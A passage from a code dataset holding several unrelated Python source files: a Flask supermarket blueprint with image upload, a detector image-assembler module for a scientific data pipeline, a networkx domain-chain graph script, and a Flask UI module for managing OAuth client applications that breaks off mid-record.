saved!\")\n","sub_path":"data/BR/prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":3209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
+{"seq_id":"45014261","text":"import os\nimport uuid\n\nfrom flask import Blueprint, render_template, request, session, url_for, redirect\n\nfrom flask_advanced.add_forms import SupermarketForm\nfrom flask_advanced.utils import get_data, add_data\n\nsupermarket = Blueprint(\"supermarket\", __name__, template_folder='templates', static_folder='static2')\n\nPATH_DATA = \"blueprint/Supermarkets/data.json\"\nPATH_STATIC = 
\"blueprint/Supermarkets/static2\"\n\ndata_supermarkets = get_data(PATH_DATA)\n\n\n@supermarket.route('/supermarket/supermarkets', methods=['GET'])\ndef get_supermarkets():\n return render_template('all_supermarkets.html', supermarkets=get_data(PATH_DATA))\n\n\n@supermarket.route('/supermarket/supermarkets', methods=['POST'])\ndef search_supermarkets():\n id_supermarket = request.form.get('id')\n location = request.form.get('location')\n data = []\n for i_supermarket in get_data(PATH_DATA):\n if i_supermarket['id'] == id_supermarket and i_supermarket['location'] == location:\n session[i_supermarket['id']] = True\n return render_template('all_supermarkets.html', supermarkets=i_supermarket,\n link_flags=session)\n elif i_supermarket['location'] == location:\n session[i_supermarket['location']] = True\n data.append(i_supermarket)\n elif i_supermarket['id'] == id_supermarket:\n session[i_supermarket['id']] = True\n data.append(i_supermarket)\n return render_template('all_supermarkets.html', supermarkets=data, link_flags=session)\n\n\n@supermarket.route('/supermarket/', methods=['GET'])\ndef get_supermarket(name_supermarket):\n for i_supermarket in get_data(PATH_DATA):\n if i_supermarket[\"name\"] == name_supermarket:\n return render_template('supermarket.html', supermarket=i_supermarket)\n else:\n return redirect(url_for('supermarket.get_supermarkets'))\n\n\n@supermarket.route('/supermarket/add_supermarket', methods=['GET'])\ndef add_supermarket():\n form_supermarket = SupermarketForm()\n return render_template('add_supermarket.html', form=form_supermarket)\n\n\n@supermarket.route('/supermarket/add_supermarket', methods=['POST'])\ndef add_supermarket_post():\n new_supermarket = {\"id\": str(uuid.uuid4()), \"name\": request.form.get('name'),\n \"location\": request.form.get('location')}\n image = request.files['image']\n new_supermarket[\"img_name\"] = image.filename\n path = os.path.join(PATH_STATIC, image.filename)\n image.save(path)\n data_supermarkets.append(new_supermarket)\n add_data(data_supermarkets, PATH_DATA)\n return redirect(url_for('supermarket.get_supermarkets'))\n\n\n","sub_path":"flask_advanced/blueprint/Supermarkets/supermarket.py","file_name":"supermarket.py","file_ext":"py","file_size_in_byte":2662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"489646103","text":"\"\"\"\nDistributed under the terms of the BSD 3-Clause License.\n\nThe full license is in the file LICENSE, distributed with this software.\n\nAuthor: Jun Zhu \nCopyright (C) European X-Ray Free-Electron Laser Facility GmbH.\nAll rights reserved.\n\"\"\"\nfrom abc import ABC, abstractmethod\n\nimport json\nimport numpy as np\n\nfrom extra_data import stack_detector_data\n\nfrom .base_processor import _BaseProcessor, _RedisParserMixin\nfrom ..exceptions import AssemblingError\nfrom ...config import config, GeomAssembler, DataSource\nfrom ...database import Metadata as mt\nfrom ...ipc import process_logger as logger\nfrom ...utils import profiler\n\n\n_IMAGE_DTYPE = config['SOURCE_PROC_IMAGE_DTYPE']\n_RAW_IMAGE_DTYPE = config['SOURCE_RAW_IMAGE_DTYPE']\n\n\nclass ImageAssemblerFactory(ABC):\n\n class BaseAssembler(_BaseProcessor, _RedisParserMixin):\n \"\"\"Abstract ImageAssembler class.\n\n Attributes:\n _require_geom (bool): whether a Geometry is required to assemble\n the detector modules.\n _stack_only (bool): whether simply stack all modules seamlessly\n together.\n _mask_tile (bool): whether to mask the tile of each module\n if applicable.\n 
_assembler_type (GeomAssembler): Type of geometry assembler,\n which can be EXtra-foam or EXtra-geom.\n _geom_file (str): full path of the geometry file.\n _quad_position (list): (x, y) coordinates for the corners of 4\n quadrants.\n _geom: geometry instance in use.\n _out_array (numpy.ndarray): buffer to store the assembled modules.\n \"\"\"\n def __init__(self):\n \"\"\"Initialization.\"\"\"\n super().__init__()\n\n self._require_geom = config['REQUIRE_GEOMETRY']\n self._stack_only = False\n self._mask_tile = False\n self._assembler_type = None\n self._geom_file = None\n self._quad_position = None\n self._geom = None\n self._out_array = None\n\n def update(self):\n if self._require_geom:\n cfg = self._meta.hget_all(mt.GEOMETRY_PROC)\n\n assembler_type = GeomAssembler(int(cfg[\"assembler\"]))\n stack_only = cfg[\"stack_only\"] == 'True'\n geom_file = cfg[\"geometry_file\"]\n quad_positions = json.loads(cfg[\"quad_positions\"],\n encoding='utf8')\n\n image_proc_cfg = self._meta.hget_all(mt.IMAGE_PROC)\n mask_tile = image_proc_cfg[\"mask_tile\"] == 'True'\n if mask_tile != self._mask_tile:\n self._mask_tile = mask_tile\n if mask_tile:\n # Reset the out array when mask_tile is switched from\n # False to True. Otherwise, edge pixels from the\n # previous train will remain there forever as the\n # \"mask_tile\" here is actually called\n # \"ignore_tile_edge\" in the corresponding function.\n self._out_array = None\n\n # reload geometry if any of the following 4 fields changed\n if stack_only != self._stack_only or \\\n assembler_type != self._assembler_type or \\\n geom_file != self._geom_file or \\\n quad_positions != self._quad_position:\n\n self._stack_only = stack_only\n self._assembler_type = assembler_type\n self._quad_position = quad_positions\n\n self._geom = None # reset first\n self._load_geometry(geom_file, quad_positions)\n # caveat: if _load_geometry raises, _geom_file will not\n # be set. Therefore, _load_geometry will raise\n # AssemblingError in the next train.\n self._geom_file = geom_file\n\n if not stack_only:\n logger.info(f\"Loaded geometry from {geom_file} with \"\n f\"quadrant positions {quad_positions}\")\n\n @abstractmethod\n def _get_modules_bridge(self, data, src):\n \"\"\"Get modules data from bridge.\"\"\"\n pass\n\n @abstractmethod\n def _get_modules_file(self, data, src):\n \"\"\"Get modules data from file.\"\"\"\n pass\n\n def _load_geometry(self, filepath, quad_positions):\n \"\"\"Load geometry from file.\n\n Required for modular detectors which must be assembled with\n a geometry.\n\n If the assembler type is not defined, it uses EXtra-geom by default.\n\n :param str filepath: path of the geometry file.\n :param tuple quad_positions: quadrant coordinates.\n \"\"\"\n raise NotImplementedError\n\n def _assemble(self, modules):\n \"\"\"Assemble modules data into assembled image data.\n\n :param array-like modules: modules data. 
shape = (memory cells,\n modules, y, x) for pulse-resolved detectors and (y, x) for\n train-resolved detectors.\n\n :return numpy.ndarray assembled: assembled detector image(s).\n shape = (memory cells, y, x) for pulse-resolved detectors\n and (y, x) for train resolved detectors.\n \"\"\"\n image_dtype = config[\"SOURCE_PROC_IMAGE_DTYPE\"]\n if self._geom is not None:\n n_modules = modules.shape[1]\n if n_modules == 1:\n # single module operation\n return modules.astype(image_dtype).squeeze(axis=1)\n\n n_pulses = modules.shape[0]\n if self._out_array is None or self._out_array.shape[0] != n_pulses:\n self._out_array = self._geom.output_array_for_position_fast(\n extra_shape=(n_pulses, ), dtype=image_dtype)\n try:\n self._geom.position_all_modules(modules,\n out=self._out_array,\n ignore_tile_edge=self._mask_tile)\n # EXtra-foam raises ValueError while EXtra-geom raises\n # AssertionError if the shape of the output array does not\n # match the expected one, e.g. after a change of quadrant\n # positions during runtime.\n except (ValueError, AssertionError):\n # recreate the output array\n self._out_array = self._geom.output_array_for_position_fast(\n extra_shape=(n_pulses, ), dtype=image_dtype)\n self._geom.position_all_modules(modules,\n out=self._out_array,\n ignore_tile_edge=self._mask_tile)\n\n return self._out_array\n\n # temporary workaround for Pulse resolved JungFrau without geometry\n if config[\"DETECTOR\"] == \"JungFrauPR\":\n shape = modules.shape\n # Stacking modules vertically along y axis.\n return modules.reshape(shape[0], -1, shape[-1])\n\n # For train-resolved detector, assembled is a reference\n # to the array data received from the pyzmq. This array data\n # is only readable since the data is owned by a pointer in\n # the zmq message (it is not copied). 
However, other data\n # like data['metadata'] is writeable.\n # FIXME: why once a while this takes a few ms???\n return modules.astype(image_dtype)\n\n @profiler(\"Image Assembler\")\n def process(self, data):\n \"\"\"Override.\"\"\"\n meta = data['meta']\n raw = data['raw']\n catalog = data[\"catalog\"]\n\n src = catalog.main_detector\n src_type = meta[src]['source_type']\n try:\n if src_type == DataSource.FILE:\n modules_data = self._get_modules_file(raw, src)\n elif src_type == DataSource.BRIDGE:\n modules_data = self._get_modules_bridge(raw, src)\n else:\n raise ValueError(f\"Unknown source type: {src_type}\")\n\n # Remove raw detector data since we do not want to serialize\n # it and send around.\n raw[src] = None\n\n except (ValueError, IndexError, KeyError) as e:\n raise AssemblingError(repr(e))\n\n shape = modules_data.shape\n ndim = len(shape)\n try:\n n_modules = config[\"NUMBER_OF_MODULES\"]\n module_shape = config[\"MODULE_SHAPE\"]\n\n # check module shape\n # (BaslerCamera has module shape (-1, -1))\n if module_shape[0] > 0 and shape[-2:] != module_shape:\n raise ValueError(f\"Expected module shape {module_shape}, \"\n f\"but get {shape[-2:]} instead!\")\n\n # check number of modules\n if ndim >= 3 and shape[-3] != n_modules:\n n_modules_actual = shape[-3]\n if config[\"DETECTOR\"] != \"JungFrauPR\":\n # allow single module operation\n if n_modules_actual != 1:\n raise ValueError(f\"Expected {n_modules} modules, but get \"\n f\"{n_modules_actual} instead!\")\n elif n_modules_actual > 2:\n raise ValueError(f\"Expected 1 or 2 modules, but get \"\n f\"{n_modules_actual} instead!\")\n\n # check number of memory cells\n if ndim == 4 and not shape[0]:\n raise ValueError(\"Number of memory cells is zero!\")\n\n except ValueError as e:\n raise AssemblingError(e)\n\n data['assembled'] = {\n 'data': self._assemble(modules_data),\n }\n # Assign the global train ID once the main detector was\n # successfully assembled.\n raw[\"META timestamp.tid\"] = meta[src][\"tid\"]\n\n class AgipdImageAssembler(BaseAssembler):\n def _get_modules_bridge(self, data, src):\n \"\"\"Override.\n\n Should work for both raw and calibrated data, according to DSSC.\n\n - calibrated, \"image.data\", (modules, x, y, memory cells)\n - raw, \"image.data\", (modules, x, y, memory cells)\n -> (memory cells, modules, y, x)\n \"\"\"\n modules_data = data[src]\n if modules_data.shape[1] == config[\"MODULE_SHAPE\"][1]:\n # Reshaping could have already been done upstream (e.g.\n # at the PipeToZeroMQ device), if not:\n # (modules, fs, ss, pulses) -> (pulses, modules, ss, fs)\n # (modules, x, y, memory cells) -> (memory cells, modules, y, x)\n return np.transpose(modules_data, (3, 0, 2, 1))\n # (memory cells, modules, y, x)\n return modules_data\n\n def _get_modules_file(self, data, src):\n \"\"\"Override.\n\n In the file, the data is separated into arrays of different\n modules. The layout of data for each module is:\n - calibrated, (memory cells, x, y)\n - raw, (memory cells, 2, x, y)\n\n - calibrated, \"image.data\", (memory cells, modules, y, x)\n - raw, \"image.data\", (memory cell, 2, modules, y, x)\n [:, 0, ...] -> data\n [:, 1, ...] 
-> gain\n -> (memory cells, modules, y, x)\n \"\"\"\n modules_data = stack_detector_data(\n data[src], src.split(' ')[1], real_array=False)\n\n dtype = modules_data.dtype\n if dtype == _IMAGE_DTYPE:\n return modules_data\n\n if dtype == _RAW_IMAGE_DTYPE:\n return modules_data[:, 0, ...]\n\n raise AssemblingError(f\"Unknown detector data type: {dtype}!\")\n\n def _load_geometry(self, filename, quad_positions):\n \"\"\"Override.\"\"\"\n if self._assembler_type == GeomAssembler.OWN:\n from ...geometries import AGIPD_1MGeometryFast\n\n if self._stack_only:\n self._geom = AGIPD_1MGeometryFast()\n else:\n try:\n # catch any exceptions here since it loads the CFEL\n # geometry file with a CFEL function\n self._geom = AGIPD_1MGeometryFast.from_crystfel_geom(\n filename)\n except Exception as e:\n raise AssemblingError(e)\n else:\n from ...geometries import AGIPD_1MGeometry\n\n try:\n # catch any exceptions here since it loads the CFEL\n # geometry file with a CFEL function\n self._geom = AGIPD_1MGeometry.from_crystfel_geom(filename)\n except Exception as e:\n raise AssemblingError(e)\n\n class LpdImageAssembler(BaseAssembler):\n def _get_modules_bridge(self, data, src):\n \"\"\"Override.\n\n Should work for both raw and calibrated data, according to DSSC.\n\n - calibrated, \"image.data\", (modules, x, y, memory cells)\n - raw, \"image.data\", (modules, x, y, memory cells)\n -> (memory cells, modules, y, x)\n \"\"\"\n return np.moveaxis(np.moveaxis(data[src], 3, 0), 3, 2)\n\n def _get_modules_file(self, data, src):\n \"\"\"Override.\n\n In the file, the data is separated into arrays of different\n modules. The layout of data for each module is:\n - calibrated, (memory cells, x, y)\n - raw, (memory cells, 1, x, y)\n\n - calibrated, \"image.data\", (memory cells, modules, y, x)\n - raw, \"image.data\", (memory cell, 1, modules, y, x)\n -> (memory cells, modules, y, x)\n \"\"\"\n modules_data = stack_detector_data(\n data[src], src.split(' ')[1], real_array=True)\n\n dtype = modules_data.dtype\n if dtype == _IMAGE_DTYPE:\n return modules_data\n if dtype == _RAW_IMAGE_DTYPE:\n return modules_data.squeeze(axis=1)\n\n raise AssemblingError(f\"Unknown detector data type: {dtype}!\")\n\n def _load_geometry(self, filename, quad_positions):\n \"\"\"Override.\"\"\"\n if self._assembler_type == GeomAssembler.OWN:\n from ...geometries import LPD_1MGeometryFast\n\n if self._stack_only:\n self._geom = LPD_1MGeometryFast()\n else:\n try:\n self._geom = LPD_1MGeometryFast.from_h5_file_and_quad_positions(\n filename, quad_positions)\n except (OSError, KeyError) as e:\n raise AssemblingError(f\"[Geometry] {e}\")\n else:\n from ...geometries import LPD_1MGeometry\n\n try:\n self._geom = LPD_1MGeometry.from_h5_file_and_quad_positions(\n filename, quad_positions)\n except (OSError, KeyError) as e:\n raise AssemblingError(f\"[Geometry] {e}\")\n\n class DsscImageAssembler(BaseAssembler):\n\n def _get_modules_bridge(self, data, src):\n \"\"\"Override.\n\n In the file, the data is separated into arrays of different\n modules. 
The layout of data for each module is:\n - calibrated, (memory cells, x, y)\n - raw, (memory cells, 1, x, y)\n\n - calibrated, \"image.data\", (modules, x, y, memory cells)\n - raw, \"image.data\", (modules, x, y, memory cells)\n -> (memory cells, modules, y, x)\n \"\"\"\n return np.moveaxis(np.moveaxis(data[src], 3, 0), 3, 2)\n\n def _get_modules_file(self, data, src):\n \"\"\"Override.\n\n - calibrated, \"image.data\", (memory cells, modules, y, x)\n - raw, \"image.data\", (memory cell, 1, modules, y, x)\n -> (memory cells, modules, y, x)\n \"\"\"\n modules_data = stack_detector_data(\n data[src], src.split(' ')[1], real_array=False)\n\n dtype = modules_data.dtype\n if dtype == _IMAGE_DTYPE:\n return modules_data\n if dtype == _RAW_IMAGE_DTYPE:\n return modules_data.squeeze(axis=1)\n\n raise AssemblingError(f\"Unknown detector data type: {dtype}!\")\n\n def _load_geometry(self, filename, quad_positions):\n \"\"\"Override.\"\"\"\n if self._assembler_type == GeomAssembler.OWN:\n from ...geometries import DSSC_1MGeometryFast\n\n if self._stack_only:\n self._geom = DSSC_1MGeometryFast()\n else:\n try:\n self._geom = DSSC_1MGeometryFast.from_h5_file_and_quad_positions(\n filename, quad_positions)\n except (OSError, KeyError) as e:\n raise AssemblingError(f\"[Geometry] {e}\")\n else:\n from ...geometries import DSSC_1MGeometry\n\n try:\n self._geom = DSSC_1MGeometry.from_h5_file_and_quad_positions(\n filename, quad_positions)\n except (OSError, KeyError) as e:\n raise AssemblingError(f\"[Geometry] {e}\")\n\n class JungFrauImageAssembler(BaseAssembler):\n def _get_modules_bridge(self, data, src):\n \"\"\"Override.\n\n Calibrated data only.\n\n - calibrated, \"data.adc\", (y, x, modules)\n - raw, \"data.adc\", TODO\n -> (y, x)\n \"\"\"\n modules_data = data[src]\n if modules_data.shape[-1] == 1:\n return modules_data.squeeze(axis=-1)\n else:\n raise NotImplementedError(\"Number of modules > 1\")\n\n def _get_modules_file(self, data, src):\n \"\"\"Override.\n\n - calibrated, \"data.adc\", (modules, y, x)\n - raw, \"data.adc\", (modules, y, x)\n -> (y, x)\n \"\"\"\n modules_data = data[src]\n if modules_data.shape[0] == 1:\n return modules_data.squeeze(axis=0)\n else:\n raise NotImplementedError(\"Number of modules > 1\")\n\n class JungFrauPulseResolvedImageAssembler(BaseAssembler):\n def _get_modules_bridge(self, data, src):\n \"\"\"Override.\n\n Calibrated data only.\n\n - calibrated, \"data.adc\", TODO\n - raw, \"data.adc\", TODO\n -> (memory cells, modules, y, x)\n \"\"\"\n modules_data = data[src]\n shape = modules_data.shape\n ndim = len(shape)\n if ndim == 3:\n # (y, x, memory cells) -> (memory cells, 1 module, y, x)\n return np.moveaxis(modules_data, -1, 0)[:, np.newaxis, ...]\n # (modules, y, x, memory cells) -> (memory cells, modules, y, x)\n return np.moveaxis(modules_data, -1, 0)\n\n def _get_modules_file(self, data, src):\n \"\"\"Override.\n\n -> (memory cells, modules, y, x)\n \"\"\"\n # modules_data = data[src_name][\"data.adc\"]\n # shape = modules_data.shape\n # ndim = len(shape)\n # if ndim == 3:\n # # (pusles, y, x) -> (pulses, 1 module, y, x)\n # return modules_data[:, np.newaxis, :]\n # # (pulses, modules, y, x,) -> (pulses, modules, y, x)\n # return modules_data\n raise NotImplementedError\n\n class EPix100ImageAssembler(BaseAssembler):\n def _get_modules_bridge(self, data, src):\n \"\"\"Override.\n\n - calibrated, \"data.image\", (y, x, 1)\n - raw, \"data.image.data\", (1, y, x)\n -> (y, x)\n \"\"\"\n img_data = data[src]\n dtype = img_data.dtype\n\n if dtype == 
_IMAGE_DTYPE:\n return img_data.squeeze(axis=-1)\n\n # raw data of ePix100 has an unexpected dtype int16\n if dtype == np.int16:\n return img_data.squeeze(axis=0)\n\n raise AssemblingError(f\"Unknown detector data type: {dtype}!\")\n\n def _get_modules_file(self, data, src):\n \"\"\"Override.\n\n - calibrated, \"data.image.pixels\", (y, x)\n - raw, \"data.image.pixels\", (y, x)\n -> (y, x)\n \"\"\"\n return data[src]\n\n class FastCCDImageAssembler(BaseAssembler):\n def _get_modules_bridge(self, data, src):\n \"\"\"Override.\n\n - calibrated, \"data.image\", (y, x, 1)\n - raw, \"data.image.data\", (y, x)\n -> (y, x)\n \"\"\"\n img_data = data[src]\n dtype = img_data.dtype\n\n if dtype == _IMAGE_DTYPE:\n return img_data.squeeze(axis=-1)\n\n if dtype == _RAW_IMAGE_DTYPE:\n return img_data\n\n raise AssemblingError(f\"Unknown detector data type: {dtype}!\")\n\n def _get_modules_file(self, data, src):\n \"\"\"Override.\n\n - calibrated, \"data.image.pixels\", (y, x)\n - raw, \"data.image.pixels\", (y, x)\n -> (y, x)\n \"\"\"\n return data[src]\n\n class BaslerCameraImageAssembler(BaseAssembler):\n # TODO: remove BaslerCamera from detector\n # make a category for BaslerCamera.\n def _get_modules_bridge(self, data, src):\n \"\"\"Override.\n\n - raw, \"data.image.data\", (y, x)\n -> (y, x)\n \"\"\"\n # (y, x)\n return data[src]\n\n def _get_modules_file(self, data, src):\n \"\"\"Override.\n\n -> (y, x)\n \"\"\"\n raise NotImplementedError\n\n @classmethod\n def create(cls, detector):\n if detector == 'AGIPD':\n return cls.AgipdImageAssembler()\n\n if detector == 'LPD':\n return cls.LpdImageAssembler()\n\n if detector == 'DSSC':\n return cls.DsscImageAssembler()\n\n if detector == 'JungFrau':\n return cls.JungFrauImageAssembler()\n\n if detector == 'FastCCD':\n return cls.FastCCDImageAssembler()\n\n if detector == 'ePix100':\n return cls.EPix100ImageAssembler()\n\n if detector == 'BaslerCamera':\n return cls.BaslerCameraImageAssembler()\n\n if detector == 'JungFrauPR':\n return cls.JungFrauPulseResolvedImageAssembler()\n\n raise NotImplementedError(f\"Unknown detector type {detector}!\")\n","sub_path":"extra_foam/pipeline/processors/image_assembler.py","file_name":"image_assembler.py","file_ext":"py","file_size_in_byte":23100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"357822620","text":"import sys\r\nimport networkx as nx\r\nimport matplotlib.pyplot as plt\r\nimport csv\r\n\r\n\"\"\"\r\n save chains\r\n\"\"\"\r\ndef save_chains(filename, chains):\r\n\r\n if sys.version_info >= (3,0,0):\r\n fp = open(filename, 'w', newline='')\r\n else:\r\n fp = open(filename, 'wb')\r\n wrt = csv.writer(fp)\r\n\r\n c = 0\r\n rej = 0\r\n for g in sorted(chains, key=len, reverse=True):\r\n if len(g) == 1:\r\n wrt.writerow([x for x in g.nodes()])\r\n c += 1\r\n else:\r\n roots = [x for x in g if g.node[x]['role'] == 'root']\r\n terms = [x for x in g if g.node[x]['role'] == 'term']\r\n\r\n for r in roots:\r\n for t in terms:\r\n ch = nx.shortest_path(g, source=r, target=t)\r\n if ch:\r\n tts = [x for x in ch if g.node[x]['role'] == 'term']\r\n if len(tts) == 1:\r\n wrt.writerow(ch)\r\n c += 1\r\n else:\r\n rej += 1\r\n #print([g.node[x]['role'] for x in ch])\r\n\r\n return c, rej\r\n\r\n\"\"\"\r\n load chain fragments\r\n\"\"\"\r\ndef load_chains(fp, limit=0):\r\n g = nx.DiGraph()\r\n\r\n for i, line in enumerate(fp):\r\n\r\n if limit and i > limit:\r\n break\r\n\r\n p = [x.strip() for x in line.split('\\t')]\r\n\r\n g.add_node(p[0], {'role': 'middle', 
'color': 'y'})\r\n if p[1] and 'a' not in p[2] and 'q' not in p[2]:\r\n g.add_node(p[1], {'role': 'middle', 'color': 'y'})\r\n g.add_edge(p[0], p[1])\r\n\r\n for n in g:\r\n # root domain\r\n if not len(g.in_edges(n)):\r\n g.node[n]['role'] = 'root'\r\n g.node[n]['color'] = 'g'\r\n\r\n if not len(g.out_edges(n)):\r\n g.node[n]['role'] = 'term'\r\n g.node[n]['color'] = 'r'\r\n\r\n return g\r\n\r\n\"\"\"\r\n\"\"\"\r\ndef plot_chains(g, filename=''):\r\n\r\n pos=nx.spring_layout(g)\r\n colors = [g.node[x]['color'] for x in g]\r\n\r\n nx.draw_networkx_nodes(g, pos, node_color=colors)\r\n nx.draw_networkx_edges(g, pos)\r\n if len(g) <= 5:\r\n nx.draw_networkx_labels(g,pos)\r\n\r\n plt.axis('off')\r\n #plt.legend()\r\n if filename:\r\n plt.savefig(filename)\r\n else:\r\n plt.show()\r\n\r\n\"\"\"\r\n\"\"\"\r\ndef get_term_count(g):\r\n return len([x for x in g if g.node[x]['role'] == 'term'])\r\n\r\n\"\"\"\r\n chain terminators histogram\r\n\"\"\"\r\ndef chain_term_hist(chains):\r\n terms = {}\r\n for g in chains:\r\n n = len([x for x in g if g.node[x]['role'] == 'term'])\r\n if n in terms:\r\n terms[n] += 1\r\n else:\r\n terms[n] = 1\r\n\r\n return terms\r\n\r\n\"\"\"\r\n chain length histogram\r\n\"\"\"\r\ndef chain_len_hist(chains):\r\n lens = {}\r\n for g in chains:\r\n n = nx.number_of_nodes(g)\r\n if n in lens:\r\n lens[n] += 1\r\n else:\r\n lens[n] = 1\r\n\r\n return lens\r\n\r\n\"\"\"\r\n\"\"\"\r\ndef main():\r\n chains_fn = 'c_newff.tsv'\r\n if len(sys.argv) > 1:\r\n chains_fn = sys.argv[1]\r\n\r\n chains_out = 'full_chains.csv'\r\n if len(sys.argv) > 2:\r\n chains_out = sys.argv[2]\r\n\r\n gr = None\r\n with open(chains_fn) as fp:\r\n gr = load_chains(fp)\r\n\r\n print('{} domains loaded...'.format(len(gr.nodes())))\r\n ug = gr.to_undirected()\r\n # list of graphs of all connected components\r\n chains = [g.copy() for g in sorted(nx.connected_component_subgraphs(ug), key=len, reverse=True)]\r\n\r\n c, rej = save_chains(chains_out, chains)\r\n print('{} chains written ({} rejected)...'.format(c, rej))\r\n print('{} trees found...'.format(len(chains)))\r\n\r\n print('nodes per tree: {}'.format(chain_len_hist(chains)))\r\n print('terminals per tree: {}'.format(chain_term_hist(chains)))\r\n\r\n plot_chains(chains[2])\r\n #for g in chains:\r\n # if get_term_count(g) > 1:\r\n # plot_chains(g)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n","sub_path":"dataset/makegraph.py","file_name":"makegraph.py","file_ext":"py","file_size_in_byte":3924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"135654152","text":"# -*- coding: utf-8 -*-\n\nfrom flask import request, render_template, url_for, flash, abort\nfrom coaster.auth import current_auth\nfrom coaster.views import load_model, load_models\nfrom baseframe import _\nfrom baseframe.forms import render_form, render_redirect, render_delete_sqla\n\nfrom lastuser_core.models import (db, User, Client, Organization, Team, Permission, ClientCredential,\n UserClientPermissions, TeamClientPermissions, Resource, ResourceAction, ClientTeamAccess,\n CLIENT_TEAM_ACCESS)\nfrom lastuser_oauth.views.helpers import requires_login\nfrom .. 
import lastuser_ui\nfrom ..forms import (RegisterClientForm, PermissionForm, UserPermissionAssignForm, ClientCredentialForm,\n    TeamPermissionAssignForm, PermissionEditForm, ResourceForm, ResourceActionForm, ClientTeamAccessForm)\n\n# --- Routes: client apps -----------------------------------------------------\n\n\n@lastuser_ui.route('/apps')\n@requires_login\ndef client_list():\n    if current_auth.is_authenticated:\n        return render_template('client_list.html.jinja2', clients=Client.query.filter(db.or_(Client.user == current_auth.user,\n            Client.org_id.in_(current_auth.user.organizations_owned_ids()))).order_by(Client.title).all())\n    else:\n        # TODO: Show better UI for non-logged in users\n        return render_template('client_list.html.jinja2', clients=[])\n\n\n@lastuser_ui.route('/apps/all')\ndef client_list_all():\n    return render_template('client_list.html.jinja2', clients=Client.query.order_by(Client.title).all())\n\n\ndef available_client_owners():\n    \"\"\"\n    Return a list of possible client owners for the current user.\n    \"\"\"\n    choices = []\n    choices.append((current_auth.user.buid, current_auth.user.pickername))\n    for org in current_auth.user.organizations_owned():\n        choices.append((org.buid, org.pickername))\n    return choices\n\n\n@lastuser_ui.route('/apps/new', methods=['GET', 'POST'])\n@requires_login\ndef client_new():\n    form = RegisterClientForm(model=Client)\n    form.edit_user = current_auth.user\n    form.client_owner.choices = available_client_owners()\n    if request.method == 'GET':\n        form.client_owner.data = current_auth.user.buid\n\n    if form.validate_on_submit():\n        client = Client()\n        form.populate_obj(client)\n        client.user = form.user\n        client.org = form.org\n        client.trusted = False\n        db.session.add(client)\n        db.session.commit()\n        return render_redirect(url_for('.client_info', key=client.key), code=303)\n\n    return render_form(form=form, title=_(\"Register a new client application\"),\n        formid='client_new', submit=_(\"Register application\"), ajax=True)\n\n\n@lastuser_ui.route('/apps/<key>')\n@load_model(Client, {'key': 'key'}, 'client', permission='view')\ndef client_info(client):\n    if client.user:\n        permassignments = UserClientPermissions.query.filter_by(client=client).all()\n    else:\n        permassignments = TeamClientPermissions.query.filter_by(client=client).all()\n    resources = Resource.query.filter_by(client=client).order_by(Resource.name).all()\n    return render_template('client_info.html.jinja2', client=client,\n        permassignments=permassignments,\n        resources=resources)\n\n\n@lastuser_ui.route('/apps/<key>/edit', methods=['GET', 'POST'])\n@requires_login\n@load_model(Client, {'key': 'key'}, 'client', permission='edit')\ndef client_edit(client):\n    form = RegisterClientForm(obj=client, model=Client)\n    form.edit_user = current_auth.user\n    form.client_owner.choices = available_client_owners()\n    if request.method == 'GET':\n        if client.user:\n            form.client_owner.data = client.user.buid\n        else:\n            form.client_owner.data = client.org.buid\n\n    if form.validate_on_submit():\n        if client.user != form.user or client.org != form.org:\n            # Ownership has changed. 
Remove existing permission assignments\n            for perm in UserClientPermissions.query.filter_by(client=client).all():\n                db.session.delete(perm)\n            for perm in TeamClientPermissions.query.filter_by(client=client).all():\n                db.session.delete(perm)\n            flash(_(u\"This application’s owner has changed, so all previously assigned permissions \"\n                \"have been revoked\"), 'warning')\n        form.populate_obj(client)\n        client.user = form.user\n        client.org = form.org\n        if not client.team_access:\n            # This client does not have access to teams in organizations. Remove all existing assignments\n            for cta in ClientTeamAccess.query.filter_by(client=client).all():\n                db.session.delete(cta)\n        db.session.commit()\n        return render_redirect(url_for('.client_info', key=client.key), code=303)\n\n    return render_form(form=form, title=_(\"Edit application\"), formid='client_edit',\n        submit=_(\"Save changes\"), ajax=True)\n\n\n@lastuser_ui.route('/apps/<key>/delete', methods=['GET', 'POST'])\n@requires_login\n@load_model(Client, {'key': 'key'}, 'client', permission='delete')\ndef client_delete(client):\n    return render_delete_sqla(client, db, title=_(u\"Confirm delete\"),\n        message=_(u\"Delete application ‘{title}’? \").format(title=client.title),\n        success=_(u\"You have deleted application ‘{title}’ and all its associated resources and permission assignments\").format(\n            title=client.title),\n        next=url_for('.client_list'))\n\n\n# --- Routes: client credentials ----------------------------------------------\n\n@lastuser_ui.route('/apps/<key>/cred', methods=['GET', 'POST'])\n@requires_login\n@load_model(Client, {'key': 'key'}, 'client', permission='edit')\ndef client_cred_new(client):\n    form = ClientCredentialForm()\n    if request.method == 'GET' and not client.credentials:\n        form.title.data = _(\"Default\")\n    if form.validate_on_submit():\n        cred, secret = ClientCredential.new(client)\n        cred.title = form.title.data\n        db.session.commit()\n        return render_template('client_cred.html.jinja2', name=cred.name, secret=secret, cred=cred)\n    return render_form(form=form, title=_(\"New access key\"), formid='client_cred',\n        submit=_(\"Create\"), ajax=False)\n\n\n@lastuser_ui.route('/apps/<key>/cred/<name>/delete', methods=['GET', 'POST'])\n@requires_login\n@load_models(\n    (Client, {'key': 'key'}, 'client'),\n    (ClientCredential, {'name': 'name', 'client': 'client'}, 'cred'),\n    permission='delete')\ndef client_cred_delete(client, cred):\n    return render_delete_sqla(cred, db, title=_(u\"Confirm delete\"),\n        message=_(u\"Delete access key ‘{title}’? 
